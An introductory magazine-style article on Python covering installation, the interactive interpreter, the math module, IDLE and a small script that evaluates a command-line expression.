Dow said this week it planned to take legal action to protect the interests of the company and its shareholders following the collapse of its K-Dow venture with
K-Dow was pivotal to Dow’s strategy to lighten its asset base and create a more market-facing chemical company with the help of a yet-to-be-completed $18.5bn takeover of
Analysts said earlier that Dow was not likely to find a new joint venture partner that would match the $7.5bn price PIC had offered for Dow’s commodity chemical assets under the K-Dow deal.
(
|
http://www.icis.com/Articles/2009/01/08/9182959/kuwait-government-to-counter-dow-claims-report.html
|
CC-MAIN-2014-49
|
refinedweb
| 176
| 53.04
|
Natume 0.1.0
HTTP DSL Test Tool
Natume is a http dsl test tool help you easily build test for mobile application.
How to install
Firstly download or fetch it form github then run the command in shell:
cd natume # the path to the project python setup.py install
Development
Fork or download it, then run:
cd natume # the path to the project python setup.py develop
Compatibility
Built and tested under Python 2.7
How to write your dsl http test
The dsl rule most like ini file format.
comment
The line begins with “#” is a comment line
method section
The line begins with a [ and ends with ] a test method section:
[add friend] # comment > POST /request fid=1233 access_token="Blabla" code: 200 content <- OK
intialize your test instance variables
You can intialize or bind the variables use intialize method:
[intialize] @key = "key" @page = 2
All key begins with “@” will build to testcase instance attributes, like @key is compiled to “self.key”, and intialize method is called in SetUp method.
http send command
The line begins with > is a http request:
> GET /post key="Blabla" page=1 > POST /profile name="Blabla" email="e@e.com"
set request header
Sometimes, the request requires to set headers, you can use “=>” command to set header
referer => Referer => Accept-Encoding => gzip, deflate, sdch Accept_encoding => gzip, deflate, sdch
Note
the head key is caseinsentive and key parts can will auto trasfer to the http real key pattern.
Assert the response
Currently, supports content regex match assert, json data assert, and response header assert. and supports three assert tokens.
:
“”:”” assert token, it is compiled to assertEqual method, to check a header or response text, or response json data:
code: 200 content_tpye : application/json charset: utf-8
<-
it is compiled to assertIn method in response content test:
content <- OK json <- ['data']['title'] = "Blabla"
=~
it is compiled to to check a regex text in response content test, the regex value must begins and ends with “/”, and can combine with the regex options:
content =~ /OK/ json =~ ['data']['title'] = /Blabla/i
Note
Currently supports three regex compile options “i”(re.I), “m” (re.M), “s” (re.S).
Test response header info
When set code command:
code: 200
it will assert response status code.
When set content_type command:
content_tpye : application/json
it will assert response content_type.
When set charset command:
charset: utf-8
it will assert response charset.
Note
When uses “:” to test response info, if the assert key not in (content, json, code, content_type, charset), it will test the response head info.
content
when we test the response text, supports the commands as below:
content: OK content <- OK content =~ /Ok/i
json
When we test the response is json data, we can use json key to assert:
json <- ['data']['title'] = 'title' json: ['data']['trackList'][0]['song_id'] = '1772167572' json: ['data']['type_id'] = 1 # date size json ~~ ['data'] = 56
DSLWebTestCase
When you wanna write the dsl test in unittest testcase, please write test method in testcase class doc:
from natume import DSLWebTestCase, WebClient import unittest class DSLWebTestCaseTest(DSLWebTestCase): u""" [index] > GET / content <- 虾米音乐网(xiami.com) [song api] > GET /song/playlist/id/1772167572/type/0/cat/json content_type: application/json charset: utf-8 json: ['data']['trackList'][0]['title'] = u'再遇见' json: ['data']['trackList'][0]['song_id'] = '1772167572' json: ['data']['type_id'] = 1 [search] > GET /search/collect key='苏打绿' code: 200 content <- 苏打绿歌曲: 最好听的苏打绿音乐试听 content =~ /Xiami.com/i [search page 2] > GET /search/collect/page/2 key=@key order='weight' code: 200 content <- 苏打绿歌曲: 最好听的苏打绿音乐试听 content =~ /XiaMi.com/i """ @classmethod def setUpClass(self): self.client = WebClient('') self.key = '苏打绿' def test_t(self): self.t(u""" > GET /search/collect/page/2 key=@key order='weight' code: 200 content <- 苏打绿歌曲: 最好听的苏打绿音乐试听 """)
You can also use t method to build request section test.
Note
The WebClient will keep and fresh the cookies and etag when you use a same webclient to test your application.
Run test in terminal
Like unittest, natume can run in terminal also, can test directories and files.
Here are the demos, the test file in project examples directory:
$ python -m natume -u examples/xiami.smoke -d test_index (__builtin__.XiamiTest) ... ok test_search (__builtin__.XiamiTest) ... ok test_search_page_2 (__builtin__.XiamiTest) ... ok test_song_api (__builtin__.XiamiTest) ... ok ---------------------------------------------------------------------- Ran 4 tests in 0.674s OK
$ python -m natume -u examples -d test_index (__builtin__.XiamiTest) ... ok test_search (__builtin__.XiamiTest) ... ok test_search_page_2 (__builtin__.XiamiTest) ... ok test_song_api (__builtin__.XiamiTest) ... ok ---------------------------------------------------------------------- Ran 8 tests in 2.893s OK: Thomas Huang
- Keywords: http,test
- License: GPL 2
- Categories
- Development Status :: 5 - Production/Stable
- Environment :: Web Environment
- Intended Audience :: Developers
- Programming Language :: Python
- Programming Language :: Python :: 3
- Programming Language :: Python :: Implementation :: CPython
- Programming Language :: Python :: Implementation :: PyPy
- Topic :: Internet :: WWW/HTTP :: Dynamic Content
- Package Index Owner: lyanghwy
- DOAP record: Natume-0.1.0.xml
|
https://pypi.python.org/pypi/Natume/
|
CC-MAIN-2017-51
|
refinedweb
| 788
| 53.41
|
Hello,
I'm currently working a project for class and I've gotten stuck. I am suppose to write a program that will read a csv file and create a text file with information from this csv file.
So, far I have code that prompts for the file name and gives a "File not found" message, if the file does not exsist and will prompt over and over again until a vaild file name is entered. What I'm stuck on is a function that I've created to get the values of a certain column into a list. The code is below:
def get_values(file, column_index): '''(str, int) -> list Return a list of values in file at colum_index''' value_list = [] for line in file: line_list = line.split('.') value_list.append(line_list[column_index]) return value_list while True: try: file_name = input('Enter in file name: ') input_file = open(file_name, 'r') break except IOError: print('File not found.')
I'm trying to make the code general as possible so that any csv file and column index can be used. When I run the program though, I get an error message for the line "value_list.append(line_list[column_index])". Why is that? I thought using a variable like this was valid.
Thanks for any help.
|
https://www.daniweb.com/programming/software-development/threads/450394/functions-for-csv-files-in-python
|
CC-MAIN-2018-47
|
refinedweb
| 208
| 70.63
|
Additional Space Center windows in Single Window Mode
I really like Single Window Mode, but sometimes wish I could have an additional Space Center window if necessary. Is there a way to do that? Would be especially helpful for tiling to different monitors.
- marksimonson last edited by
Indeed! Option-click on the Space Center icon. (via @RoboFontCanThis on Twitter, which I discovered the other day.)
Hmm... doesn't seem to work in Single Window Mode.
- marksimonson last edited by
Oops, I missed that part. I always work in Many Window Mode.
see
from mojo.UI import OpenSpaceCenter OpenSpaceCenter(CurrentFont(), newWindow=True)
|
https://forum.robofont.com/topic/189/additional-space-center-windows-in-single-window-mode
|
CC-MAIN-2020-16
|
refinedweb
| 101
| 62.64
|
Import custom sage libraries into a Jupyter notebook
What is the correct way to write and import custom SAGE libraries into a jupyter notebook?
When using jupyter notebooks with a python kernel, importing your own python library is as easy as saving a file foo.py in the same directory as the notebook and putting an
import foo line in the notebook. Using a SAGE kernel, I can import foo.py into my notebook, but without the ability to call SAGE methods: e.g. calling the function
def monty(n):
return SymmetricGroup(n)
from foo.py gives the error,
NameError: global name 'SymmetricGroup' is not defined
My desired workflow: work in a notebook for convenience but be able to pass on what I've done in the form of a library.
|
https://ask.sagemath.org/question/36553/import-custom-sage-libraries-into-a-jupyter-notebook/
|
CC-MAIN-2019-43
|
refinedweb
| 131
| 70.43
|
@JoFa: I don't use this package anymore, so I am going to orphan it.
Future adopter: please read @JoFa's suggestion and implement it if appropriate.
Search Criteria
Package Details: anttweakbar 1.16-7
Dependencies (2)
Required by (1)
Sources (1)
Latest Comments
mis commented on 2016-02-24 17:19
thiagowfx commented on 2016-02-24 17:14
@JoFa: I don't use this package anymore, so I am going to orphan it.
JoFa commented on 2016-02-24 12:49
tried to install the vulkan demo 'gl_vk_chopper' which needs anttweakbar to build. however it also requires libAntTweakBar.a, so I suggest you to add something like: install -Dm755 lib/libAntTweakBar.a "${pkgdir}/usr/lib/libAntTweakBar.a" to the pkgbuild
regards,
Jonas
Zuf commented on 2014-03-18 20:13
Fixed, thanks!
thiagowfx commented on 2014-03-18 00:37
Please add 'glu' as a make dependency, otherwise we get this error:
TwEventGLUT.o TwEventGLUT.c
In file included from TwEventGLUT.c:23:0:
MiniGLUT.h:38:23: fatal error: GL/glu.h: No such file or directory
# include <GL/glu.h>
Zuf commented on 2013-12-10 19:10
Source updated
thiagowfx commented on 2013-12-10 17:08
Please change the mirror again.
For example, this one works currently:
source=("")
Zuf commented on 2013-10-30 19:22
Fixed.
Anonymous comment on 2013-06-14 00:40
The download URL has rotted. Need to change "ignum.dl.sourceforge.net" to "superb-dca3.dl.sourceforge.net" in the PKGBUILD file.
ekpyron commented on 2012-08-07 22:40
Current version is 1.15.
Added the static lib, and since I don't use it, orphaned again.
|
https://aur.archlinux.org/packages/anttweakbar/
|
CC-MAIN-2018-09
|
refinedweb
| 279
| 60.51
|
[Poll] Which direction should Qt Quick 2.x development take?
p{color:#777}. ----------------------------------------------------------------------------
p{color:#258}. Qt 5.0 (which is already in feature-frozen alpha stage) introduces the new scene-graph based Qt Quick 2.0 framework. While the foundations are there, and for many use-cases (mobile apps, certain types of games, ...) it is already deemed a vastly superior way of creating UI's, it is definitely not yet ready for replacing the Qt Widget framework everywhere.
p{color:#258}. Considering that only finite development resources are available, which potential improvement/add-on for Qt Quick 2.x should - in your opinion - have the highest priority for Qt 5.1 and 5.2?
%{color:white}.%
Desktop Components
|{text-align:left}. a comprehensive set of Qt Quick UI elements with native look & feel on all supported desktop platforms.|
|{text-align:left;color:#BF5F00}. %{text-decoration:underline}Note:% There is currently a "labs project": for this.|
Generic Theming Support
|{text-align:left}. a way to easily create themeable components, similar to what QStyle make possible for QWidget subclasses|
Binary QML
|{text-align:left}. support for translating QML into a corresponding binary data structure at compile time (rather than letting the Qt Quick engine do it during application start-up), for IPR(intellectual property rights) protection and reduced application start-up time|
Expanded C++ Component API
|{text-align:left}. support for extending existing Qt Quick components, and more convenience for implementing new ones, in C++|
|{text-align:left;color:#BF5F00}. %{text-decoration:underline}Note:% Qt Quick 2.0 does already allow C++ developers to create custom components by subclassing "QQuickItem": or "QQuickPaintedItem":. However, the built-in components (like "Rectangle":, etc.) are not exposed to C++ and hence cannot be extended/re-used, and also some users feel that in general more C++ convenience API could be provided.|
Full C++ API %{color:#BF5F00}(should have been better named: "Dedicated C++ Front-end API")%
|{text-align:left}. first-class support for instantiating Qt Quick elements and populating the Qt Quick scene graph directly from C++, without using any QML - potentially allowing C++11 lambdas (or a custom signal/slot based solution) instead of JavaScript expressions for property bindings|
|{text-align:left;color:#BF5F00}. %{text-decoration:underline}Note:% Qt Quick 2.0 does already provide some C++ API for manually populating the scene graph through "QSGNode":, "QSGGeometry":, "QSGMaterial":, etc. However, some things - like instantiating built-in components - is not possible without passing around at least small snippets of QML, and no clean C++-only alternative is provided for property bindings (one of the things that make Qt Quick so powerful), and altogether some users feel that the existing C++ scene-graph API should be either expanded, or complemented by a different one (e.g. declarative, but still native C++) to make it a "first-class citizen" alternative to the QML "front-end" for Qt Quick.|
Optional V8 Dependency
|{text-align:left}. support for building & deploying Qt Quick without the V8 engine for applications which don't need any of the JavaScript-depending features|
Graphics View Component
|{text-align:left}. a Qt Quick component providing similar massive-data-visualization functionality as the QWidget-based QGraphicsView (including things like BSP tree indexing of items, collision detection, ...)|
some other improvement/add-on (specify in comment section)
nothing - I'm happy with what Qt Quick 2.0 (to be shipped with Qt 5.0) provides
nothing - I don't like Qt Quick altogether, I'd like to see more resources put into improving other parts of Qt
%{color:white}.%
p{color:#258}. Other things which have been requested before in various places, but which I missed at the time when I created the poll (if applicable to you, select "some other improvement/add-on" in the poll and specify by leaving a comment):
%{color:white}.%
Sandboxed Mode
|{text-align:left}. Ability to safely run QML files from non-trusted sources, e.g. for using Qt Quick as a Powerpoint replacement.|
|{text-align:left;color:#BF5F00}. %{text-decoration:underline}Note:% For an idea of what QML makes possible for "presentation" use-cases, see this "labs project": .|
Better Model/View Support
|{text-align:left}. More convenience for creating QML views for complex custom data models implemented in C++.|
p{color:#777}. ------------------------
":...]
- cfreeloader
I appreciate you putting together this poll. The topic items seem fairly inclusive of various things people have been talking about. Thank you!]
Is this so strange?
It almost seems that most people do not understand the reason and origin of Qt anymore.
Qt is (was?) a cross desktop C++ api.
It now becomes a very limited platform for creating flash/html5 like apps and games (that's my opinion of course).
I do not mind that the QML capability gets added.
I do greatly mind that bigger parts of Qt need to suffer from this.
I do not have the money, I do not have the knowledge and I do not have the time to turn this around. I only have my voice and passion for Qt. I'm very sad and deeply disappointed that Nokia steers Qt in the current way.
However, I would at the same time like to invest time in QML with the Raspberry Pi as I think on this platform it can be a nice tool.
some other improvement/add-on
Easier connecting of advanced QAbstractItemModel to QML.
- Brandybuck
I wouldn't mind QtQuick so much, if it weren't for the extreme awkwardness of communicating with the backend. It's almost like Qt is deliberately discouraging the use of C++ anywhere.
It agree it would be nice to see what people are thinking in the community. I'd just like to annotate with some points on the scope of these options (very important for anyone who wants to actively prioritize something by contributing). This might also provide some insight on how realistic it is for these to happen by 5.1.
[quote author="jdavet" date="1335468153"]
- Desktop Components
[/quote]
Everyone agrees this should be done, it fits into the QML picture well, and there's a labs project already. If a common API or architecture can be achieved (even a de facto one by convention) then per platform implementations shouldn't be too hard.
[quote author="jdavet" date="1335468153"]
- Generic Theming Support
[/quote]
Already multiple labs level projects, and . Everyone also seems to agree this should be done as part of QtQuick, just that no-one has had time to do it.
[quote author="jdavet" date="1335468153"]
- Binary QML
[/quote]
Already done ;) . The only thing missing is allowing the compile phase to be run separately to instantiating the scene, so that the binary data can be stored. This extra step wouldn't be in conflict with any existing QML direction, but no-one has gotten around to it.
[quote author="jdavet" date="1335468153"]
- Expanded C++ Component API
[/quote]
This one is big. Not just in terms of relative furor, but in terms of the work involved too. For UI elements we have usually found the ideal QML API to be different to the ideal C++ API, and for the QtQuick UI primitives we have been focusing the first several years on just getting a good QML API. I'm not even sure we're done with that challenge.
Creating an adjacent C++ API sharing the same implementation without causing drawbacks for one or both APIs is not theoretically impossible. But it will be tough, and there's a lot of work involved. I don't really know how that would look. Eventually, when the QML API is finished, core QML contributors will probably start to tackle this problem. But I can't see visible progress being made by 5.1, there's just too much to do.
[quote author="jdavet" date="1335468153"]
- Full C++ API %{color:#BF5F00}(should have been better named: "Dedicated C++ Front-end API")%
[/quote]
Basically a subset of the last one. Once C++ APIs have been developed to allow that sort of fine control from C++, basic instantiation and manipulation should come for free.
[quote author="jdavet" date="1335468153"]
- Optional V8 Dependency
[/quote]
Plausible, but it's not a clear usecase. You've thrown away much of QML by removing full JS bindings even if we still allowed optimized bindings. While simpler than adding a C++ API, that sounds like the correct solution for this usecase.
[quote author="jdavet" date="1335468153"]
- Graphics View Component
[/quote]
Interesting idea. I haven't heard of this one before, so I don't know if it's something that should be done by QQuickCanvas (as a 'better' QGraphicsScene/View) or whether there should be a separate element for this more specialized usecase. A clear usecase or a labs-level prototype might be necessary to convey this idea effectively.
[quote author="jdavet" date="1335468153"]
- nothing - I'm happy with what Qt Quick 2.0 (to be shipped with Qt 5.0) provides
[/quote]
QtQuick is still very young - I'm quite suspicious of anyone who says this ;) .
[quote author="jdavet" date="1335468153"]
- Sandboxed Mode
[/quote]
This is a good idea that should be straight forward. All you need is a network access manager that denies loading external resources (and xmlhttprequest), and a strict limit on the C++ plugins that can be imported (e.g., only allow "QtQuick 2.0" to import C++ plugins).
[quote author="jdavet" date="1335468153"]
- Better Model/View Support
[/quote]
This one's already on my list as a future research project :) . Very ill-defined scope at the moment though.
[quote author="jdavet" date="1335468153"]
":...][/quote]
This disclaimer explains the official way to prioritize things - contributors all get to decide for themselves. Becoming a contributor is an easy way to advance many of these forward (well, easy if you have C++ skills already). Commercial customers should be able to influence what Digia prioritizes via separate channels.
Better Model/View Support
[quote author="MStormO" date="1335840907" [/quote]
Or how to keep the voice of the little open source desktop developer quiet.
I don't understand your post at all.
The only way I can voice my opinion is through these forums/blogs and polls.
I can't attend your contributor summit. I do not have the right credentials, I do not have the time, I do not have the money to travel and the amount of people that can attend is limited.
I can't help with writing core parts of Qt. I do not have the knowledge and I do not have the time. Did you know I'm a user of Qt not a developer? I use Qt to make my daily work easier.
Tell me how I can not interpret your post as anything else as "get bent" ?
There are few things I can't stand in this world, one is unfairness. You are unfair!
[quote author="tbscope" date="1335856732"]I don't understand your post at all.
The only way I can voice my opinion is through these forums/blogs and polls.[/quote]
Nobody said you can't voice your opinion. The point being made is that code doesn't come out of thin air, it requires people to actually work on it. As the open source developer you profess to be, surely you understand that, so I won't go into too much detail.
So, assuming we can agree that for code to materialise, it needs developer time. There's a number of different ways to get developer time. I've covered these elsewhere, but here's a rough list:
- do it yourself
- pay someone else to do it for you (Digia, other consultancies)
- hope that you find someone else that is willing to do one of the above
I'm perfectly happy for you to be in category #3 on that list, I really don't mind. But you need to adjust your expectations as to how likely it is that someone is going to pay attention to you and do what you want when you're offering nothing but opinions.
Opinions don't pay engineer's salaries, add features, or fix bugs.
Now, that doesn't mean that your complaints may not be valid - I don't think anyone here has said anything like that - but it does mean that they most likely won't get the priority you think they deserve.
Marius was pointing out - quite rightly - that Qt is a meritocracy. A do-ocracy. A community of people who work to improve Qt together. If you're here because you're getting something for 'free', then you're lucky that open source allows for that to happen. It just doesn't mean anyone has to pay attention to you.
Finishing with a quote from Linus Torvalds, who said it best: "talk is cheap, show me the code":.
Something worth addressing seperately:
[quote author="tbscope" date="1335856732"]I can't help with writing core parts of Qt. I do not have the knowledge and I do not have the time.[/quote]
Writing Qt is pretty much the same as writing any other code. There's nothing about it that makes it special, or magical, apart from your preconceptions. Sure, there are somewhat strict quality standards (meaning you need to write tests to prevent bugs from reappearing etc), but many other projects have these, and they aren't so hard to understand.
What's more is that there are plenty of people around the project who will more than happily help out if you want to work on something - anything. You're welcome here.
"I don't have the time" - well, I can understand that to some degree. The work I do on Qt is done in my own free time, too - I'm not paid for it. But Qt as a whole is greater than the sum of its parts: the more everyone chips in a little, the more we get done as a whole.
Finally, you've got to admit that there's something cool about thousands of developers and millions of people worldwide using code you wrote, no matter how small.
I'm glad to see this poll appear. It seems way more balanced than the previous one. It is rather limiting though, in the sense that you can only select one item, while I think more than one item on the list is important.
I voted for the Desktop Components. This labs project, already demonstrated at last years Contributors Summit, really deserves more attention. However, I think that should be in the context of a wider effort to make components more compatible in terms of API across the range of platforms.
Model/View is also of prime importance, I think. However, I think this cannot stand separately from a re-thinking of the current C++ model view classes. This is a big task to do right, I think.
I think it should be a goal that at least the components become easier accisible from C++, but I understand the need to stabilize them first before freezing the API by making them public. However, being able to compile-in QML in binary form and get rid of the V8 engine if you want would be very nice. If only because it would make distribution to Apple devices and systems easier. Yes, you loose features in QML if you do that, but those that can live with that really benefit in terms of cross platform compatibility and distribution file size, as well as in startup times.
Hi.
I would like to know if there are any ongoing work to use ANGLE () inside the QDeclarative module, this topic seemed the right place to ask.
It's a feature I really like to see.
On some windows computer, opengl is not supported ( mostly because the drivers are not installed or outdated) but directX 9 is supported. So ANGLE would be a way to support QML 2.0 on most of the windows desktop out there.
If not, is it possible to have a quick evaluation of how much efforts this would cost ?
Thanks !
@cor3ntin:
There has been some talk about it, but as far as I know, no one has yet experimented with it.
Feel free to do some experiments and report them on the development mailing list, which you will find here:
1.) Desktop components
but PLEASE focus on making it possible to have the SAME api for ALL components - at least for those components which are generic on all platforms.
Example: I don't want to write 3 Qml Uis for Windows, Linux and OSX just for supporting all of them - the platform desktop components should take care about everything for me by just including something like:
import org.qt.qml.desktopcomponents;
This poll is impossible to answer, because it lists multiple things that are fundamental requirements as mutually exclusive choices :-)
[quote author="miroslav" date="1337777681"]This poll is impossible to answer, because it lists multiple things that are fundamental requirements as mutually exclusive choices :-)[/quote]
Yeah, the forum does not support multiple-answer polls. So you'll need to prioritize... :-)
The "right way" to do this would actually require setting up a special survey web page, and allow the audience to rate each feature on a scale like this:
|\6{text-align:left;padding:3px}. 3. Binary QML |
|\6{text-align:left;padding:3px}. %{color:white}...% Adding this feature right now (for Qt 5.1)% |
|\6{text-align:left;padding:0}. %{color:white}...% Adding this feature eventually (at some point in the future)% |
Doing it as a proper survey would also allow correlating the results with different user groups, by adding questions like...
|\6{text-align:left;padding:3px}. What will you use Qt Quick for primarily, in the forseable future? |
|{text-align:left;border-top:none;padding:3px}. %{color:white}...% !{vertical-align:bottom}! freeware or open-source project(s) |
|{text-align:left;border-top:none;padding:3px}. %{color:white}...% !{vertical-align:bottom}! commercial software |
|\6{text-align:left;padding:3px}. What's your experience level with Qt Quick? |
|{text-align:left;border-top:none;padding:3px}. %{color:white}...% !{vertical-align:bottom}! don't know much about it yet |
|{text-align:left;border-top:none;padding:3px}. %{color:white}...% !{vertical-align:bottom}! read lots of documentation, but didn't get my hands dirty yet |
|{text-align:left;border-top:none;padding:3px}. %{color:white}...% !{vertical-align:bottom}! already experimented with it somewhat |
|{text-align:left;border-top:none;padding:3px}. %{color:white}...% !{vertical-align:bottom}! wrote one or more small apps with it (or ported existing ones) |
|{text-align:left;border-top:none;padding:3px}. %{color:white}...% !{vertical-align:bottom}! successfully wrote a large, complex application with it (or ported an existing one) |
|{text-align:left;border-top:none;padding:3px}. %{color:white}..........% → type of application: !! |
|{text-align:left;border-top:none;padding:3px}. %{color:white}...% !{vertical-align:bottom}! helped to design/develop Qt Quick itself |
But for this to happen, the Qt Project (or Nokia or Digia) would have to get behind it and do it as an official survey.
I'd like to see Qt Mobility made available for Desktop targets in Qt Creator (I haven't tried 5.0 yet, but in Qt 4.8 I am not able to compile for desktop if I use Mobility). Also, if Mobility gets allowed for desktop targets, I'd like to see it renamed to something more suitable because a desktop target clashes with the "mobile" aspect of the name "Qt Mobility".
]
It'd be nice if QML/JS was officially supported for all mobile platforms. I heard that Necessitas (Qt for Android) will be merged with Qt in the near future. That's great to hear. I hope the same will happen with the iOS efforts, and that a common API will be created to access device hardware and common functionalities regardless of plarform.
|
https://forum.qt.io/topic/16232/poll-which-direction-should-qt-quick-2-x-development-take
|
CC-MAIN-2018-09
|
refinedweb
| 3,316
| 63.49
|
[
]
Anthony Insolia commented on GERONIMO-6474:
-------------------------------------------
I may have fixed this problem by first eliminating the second id and also by making two superclasses
serializable. I missed them. I will do more testing before I close the bug report.
> Reactivated/Reloaded Entity Bean not restoring UUID. UUID is correct upon construction
and is correct in the RDB.
> -----------------------------------------------------------------------------------------------------------------
>
> Key: GERONIMO-6474
> URL:
> Project: Geronimo
> Issue Type: Bug
> Security Level: public(Regular issues)
> Components: OpenEJB
> Affects Versions: 3.0.0
> Environment: Apache Geronimo 3.0
> Apache Myfaces
> Primefaces
> MySQL
> Reporter: Anthony Insolia
>
> I have a User class with an @OneToOne relationship to a Desktop class
> User->Desktop
> @Entity
> @Table(name="user_table")
> @Unique(members={"name"})
> @ManagedBean(name = "User")
> @RequestScoped
> public class User extends Element_ implements Serializable {
> @Id
> private long uuid = 0;
> @OneToOne(targetEntity=Folder.class,cascade=CascadeType.ALL)
> @MapsId
> private Folder desktop = null;
> ...
> I was trying to save the User and their desktop and JPA informed me that the UUID at
the superclass level didn't match the UUID at the subclass level.
> Here is some println's from a method in User market @PostLoad to see what the desktop
UUID's are:
> User (snoop) is looking at the desktop with THIS <uuid> 0
> User (snoop) is looking at the desktop with SUPER <uuid> 429823953
> 'snoop' is the name of the @PostLoad method in my User class
> I tried to repair the UUID as a work around but it causes an exception:
> <openjpa-2.1.1-r422266:1148538 nonfatal user error> org.apache.openjpa.util.InvalidStateException:
Attempt to change a primary key field of a
> n instance that already has a final object id. Only new, unflushed instances whose id
you have not retrieved can have their primary keys cha
> nged.
> I saw the same probelm in another area of my code where the UUID was correct and then
zero'ed. This problem seems to be directly attributable to the fact that a view controller
is defined as @ViewScoped. I don't see the problem when I change the controller to @SessionScoped.
> Not sure what is going on here but these UUID's are getting zero'ed by someone/something/somecode
both before getting stored and after reactivation. I am fairly confident that this is not
my code that is causing the problem b/c I've tried to explcitiy update the UUID's but Geronimo
won't let me b/c they have been made final by Geronimo.
> FYI I am using the TABLE_PER_CLASS model
--
This message is automatically generated by JIRA.
If you think it was sent incorrectly, please contact your JIRA administrators
For more information on JIRA, see:
|
http://mail-archives.apache.org/mod_mbox/geronimo-dev/201307.mbox/%3CJIRA.12654830.1372197905147.202545.1372812560023@arcas%3E
|
CC-MAIN-2016-36
|
refinedweb
| 438
| 52.29
|
Hi Philipp > > Yes, > > but this is only a problem how we lookup views/pages via /@@ in > > templates. > > That's how we lookup views. @@ is short for ++view++. > Traversal namespaces are the way to lookup things that are > not direct attributes.
The namespace ++view++ is in the first line a namespace which makes it possible to use the same naming for ojects and views on a container. Second this is callable via the @@ in page templates. The implementation that we didn't use a tales expression is bad. It doesn't make sense to me that we can automaticly use traversal namespace in tales. I think the API for implement additional functionality is the ITALESExpression interface. Every other implementation which makes something possible in TAL is bad. That's just what I think. > >. Yes, I know, but where doe we describe the interface for that? Is there a interface somewhere that I can see why I can call traversal namespace from TAL? Perhaps I missed this till now. How do you explain the TAL implementation of a @@ lookup to someone? Regards Roger Ineichen > Philipp > _______________________________________________ > Zope3-dev mailing list > Zope3-dev@zope.org > Unsub: > > > _______________________________________________ Zope3-dev mailing list Zope3-dev@zope.org Unsub:
|
https://www.mail-archive.com/zope3-dev@zope.org/msg05165.html
|
CC-MAIN-2017-30
|
refinedweb
| 203
| 77.03
|
Python has been around for a dozen years and is going strong — two production releases a year, a vibrant community, lively Net presence, yearly conferences, tracks on Python at Open Source and Web Development venues, books, articles, the works. Why is Python so popular? The reasons are simplicity, regularity, and the talent of Guido van Rossum, Python’s inventor and Benevolent Dictator For Life. Hundreds of people contribute to Python, but Guido has the final say; his hand at the helm makes Python a well-architected whole, not a soup of “features” (For more on Guido, see our interview with him in the December 2001 issue, available online at.). There are no “convenient” shortcuts, quirks, or special cases: just power through simplicity, clean syntax, and generality.
Python is simple inside, too; its highly modular, structured internals and clean, well-documented API makes it easy to port, extend, embed in applications, and interface with existing libraries. Jython, the 100 percent pure Java implementation of Python, lets you deploy Python wherever you can use Java, with full access to Java’s class libraries.
Python can also be found embedded in applications such as the cooledit editor and the Blender 3D modeler and is at the heart of the Zope Web application server. And Python has lots of extensions to let you handle diverse tasks, including numerical applications, image processing, distributed computing, multimedia, and games.
If you’re just beginning to learn how to program, are doing object-oriented programming, writing scripts, prototyping large programs, or even developing them entirely, Python is a strong candidate. Python provides power through simplicity, with full-featured core libraries, easy interfacing, and backwards compatibility, too.
Let’s take a closer look at Python and see just how it provides all this power.
Installation and Configuration…If You Need It
Python is probably already on your system. Try running python-V at a shell prompt; if Python’s in your PATH, this tells you which version it is.
If you don’t have Python, or have an older release (such as 1.5.2), you can either install it with whatever tool your distribution uses or download the source package for the latest stable release (currently 2.2) from.
You can then build and install Python by running the following commands:
$ tar xzf Python-2.2.tgz
$ cd Python-2.2
$ ./configure
$ make
$ sudo make install
That’s it; you now have the latest and greatest Python release. For your convenience, make sure /usr/local/bin is in your PATH. If you have problems, send e-mail to help@python.org, giving all the details (copy and paste error messages, don’t summarize them). Many volunteers monitor that “help line,” so you should be able to get up and running quickly.
Interactive Python
An easy way to try Python is via the interactive interpreter:
$ python
Python 2.2 (#1, Nov 30 2001, 15:08:22)
[GCC 2.96 20000731 (Mandrake Linux 8.1 2.96-0.62mdk)] on linux2
Type “help”, “copyright”, “credits” or “license” for more information.
>>>
>>> is the prompt the interactive interpreter uses to ask for any statement or expression:
>>> 2+2
4
>>> 1.23**4.56
2.5702023016193025
The ** operator performs exponentiation, so we have just computed 1.23 to the 4.56th power. Python is a nice advanced calculator, but you will notice it’s missing trigonometric and other functions. No problem, they’re in the library (in the math module); we just need to import it:
>>> import math
>>> math.log(1.23**math.sin(0.45))
0.090044028754846059
The command import math binds the name math to the math module object, making all names bound in the module available as attributes of math, as shown by the calls to math.log and math.sin. If you don’t like the name math, you can bind the module object to a different name:
>>> import math as Foo
>>> Foo.log(1.23**Foo.sin(0.45))
0.090044028754846059
Alternatively, the command from math import * puts all the names from the math module into your current namespace, making them available directly:
>>> from math import *
>>> log(1.23**sin(0.45))
0.090044028754846059
The command from modulename import * is handy for interactive use or tiny scripts but much less readable in “real” programs; the reader might wonder where the names log and sin came from.
A lot of Python’s functionality lives in the library, neatly organized into modules and packages (hierarchical collections of modules). The current standard library has 165 top-level modules and packages and a total of almost 300 modules (including platform-specific ones); we’ll see some of them in later examples.
Python’s interactive interpreter is a text-mode program. If you prefer to use a GUI program for your development, you can use IDLE, the Python Interactive DeveLopment Environment, that is included with Python. IDLE is built with Tkinter, one of many Python packages that you can also use to develop your own GUI applications. You need to have Tcl/Tk (8.1 or better) installed on your system before you can build or use Tkinter. If you need to, you can download Tcl/Tk from.
IDLE’s “shell window” (see Figure One) resembles the interactive interpreter but adds features such as colorization and call tips. Menus and shortcuts let you open editor windows, write and edit Python scripts, run the debugger, view the stack, and so on. Many other Python IDEs, both free and commercial, are also available. Many old-timers, however, prefer the interactive interpreter and a good text editor.
Scripts
Python scripts are just text files (often with the extension “.py“, but it’s not required). Listing One contains a script that evaluates an arbitrary expression passed as an argument to it. If we run this program, we might see output like this:
Listing One: exp
1 #!/usr/local/bin/python
2
3 from math import *
4 import sys
5
6 expression = sys.argv[1]
7 print expression,’=',eval(expression)
$ ./exp 2+2
2+2 = 4
$ ./exp 1.23**4.56
1.23**4.56 = 2.57020230162
We use the normal Unix hash-bang (#!) method to invoke Python. Line 3 imports all the names from the math module. Line 4 imports the sys module, which gives us access to important aspects of a program’s environment. The expression sys.argv[1] is the first argument passed to the program; since we want to evaluate it as an expression, we bind it to the name expression in line 6. You could say “assign it to the variable” rather than “bind it to the name,” but “bind” and “name” better convey the connotations that correspond to Python’s semantics; this is covered in more detail later.
The print statement in line 7 emits the expression, an equals sign, and the result obtained by evaluating the expression with the built-in function eval. The print function automatically inserts spaces between the items it emits, and a newline at the end.
You may notice that print displayed the result of 1.23**4.56 with fewer digits than the interactive interpreter showed; floating-point arithmetic is inexact, and print and the interactive interpreter use different defaults for the number of digits to display. This is adjustable if you so desire.
Python and the Web
